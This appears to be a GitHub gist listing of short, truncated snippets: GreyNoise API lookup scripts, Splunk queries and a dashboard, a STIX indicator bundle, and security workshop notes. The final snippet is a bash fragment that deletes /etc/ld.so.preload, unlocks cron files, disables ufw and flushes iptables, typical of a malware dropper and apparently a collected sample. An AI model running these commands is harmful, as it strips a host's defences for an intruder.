
superducktoes / ip_sim_hunting.py
Build Splunk queries based on IP sim output
import os
import sys

import requests
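# Read the key from the environment so a real credential never gets pasted
# into (and committed with) the script; when unset it is "" exactly as before.
# The service this key is for is not visible in this snippet — presumably
# GreyNoise, given the author's other scripts; confirm against the headers below.
api_key = os.environ.get("GREYNOISE_API_KEY", "")
limit = 10  # can change for more
if len(sys.argv) < 2:
    # Usage error: report on stderr and exit non-zero so a caller or a shell
    # pipeline can tell the run failed (quit() exited with status 0).
    print("need an IP", file=sys.stderr)
    sys.exit(1)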
headers = {
superducktoes / greynoise_file_query.py
Look up the IPs found in a given file against GreyNoise
import fileinput
import re
from greynoise import GreyNoise
# command usage: cat <file_ips>.txt | python3 file_ips_lookup.py
# reads the file line by line and extracts the IPs it contains
def parse_results(greynoise_results):
    """Print one summary line per GreyNoise lookup result.

    Each item is expected to be a dict carrying at least the "ip", "noise"
    and "riot" keys (the only fields read here); a missing key raises
    KeyError. Output goes to stdout; nothing is returned.
    """
    for record in greynoise_results:
        summary = (
            f"IP: {record['ip']} - Noise Status: {record['noise']}"
            f" - RIOT Status: {record['riot']}"
        )
        print(summary)
superducktoes / gn_query_write_to_file.py
GreyNoise Write IP's To File
import json
import os

import requests
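# Pull the key from the environment rather than pasting it here: a literal
# in the script ends up in git history and in every shared copy of the gist.
# Unset env var -> "" (the previous default), so callers see no change.
GN_API_KEY = os.environ.get("GREYNOISE_API_KEY", "")
# GNQL: SSH brute-forcers seen in the last day, restricted to non-spoofable
# sources (spoofable:false).
GN_QUERY = 'tags:"SSH Bruteforcer" last_seen:1d spoofable:false'
file_name = "./greynoise_ips.txt"  # output path for the matched IPs
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"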
superducktoes / GreyNoise GNQL Query Results
Query GreyNoise without the GN SDK
import json
import os

import requests
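# Read the key from the environment so the gist never carries a real
# credential; unset -> "" as before, so nothing downstream changes.
GN_API_KEY = os.environ.get("GREYNOISE_API_KEY", "")
# GNQL: everything classified malicious that was seen in the last day.
GN_QUERY = "last_seen:1d classification:malicious"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"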
HEADERS = {
"accept": "application/json",
superducktoes / workshop.txt
GN Road Show Workshop
Stop Chasing Ghosts: California Roadshow
Cheat Sheet
You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Workshop participants play the role of the Security Analyst at “Milk Co.”: they investigate the resulting alert to understand what happened, decide how to stop further attacks quickly, and then dig into the indicators that can be used for hunting.
Question Answer Form
https://stopchasingghosts.typeform.com/to/JWKos6K2
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc
superducktoes / GreyNoise Firewall Dashboard
Splunk firewall dashboard that enriches firewall events with GreyNoise data
<form theme="dark">
<label>GreyNoise Firewall Data</label>
<fieldset submitButton="false">
<input type="time" token="field1">
<label></label>
<!-- Default search window when the dashboard loads: from 24 hours ago,
     snapped to the hour (-24h@h), up to now. The picker is unlabelled
     (empty <label/>) — consider giving it a visible name. -->
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
import fileinput
import os
import re

from greynoise import GreyNoise
# command usage: cat <file_ips>.txt | python3 file_ips_lookup.py
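# The key is read from the environment (empty if unset, as before) so the
# gist never carries a real credential that ends up in git history.
api_client = GreyNoise(api_key=os.environ.get("GREYNOISE_API_KEY", ""))
ip_list = []  # IPs collected from the input; filled by the parsing that follows
# parse file for ips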
{
"type": "bundle",
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7",
"objects": [
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564",
"created": "2022-05-19T20:10:17.632149Z",
"modified": "2022-05-19T20:10:17.632149Z",
from greynoise import GreyNoise
import json
import csv
import argparse
import os
from stix2 import MemoryStore, Indicator
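# Take the key from the environment instead of a literal in the script; an
# unset variable yields "" exactly as the old hard-coded value did.
api_client = GreyNoise(api_key=os.environ.get("GREYNOISE_API_KEY", ""))
parser = argparse.ArgumentParser()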
#!/bin/bash
ulimit -n 65535
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F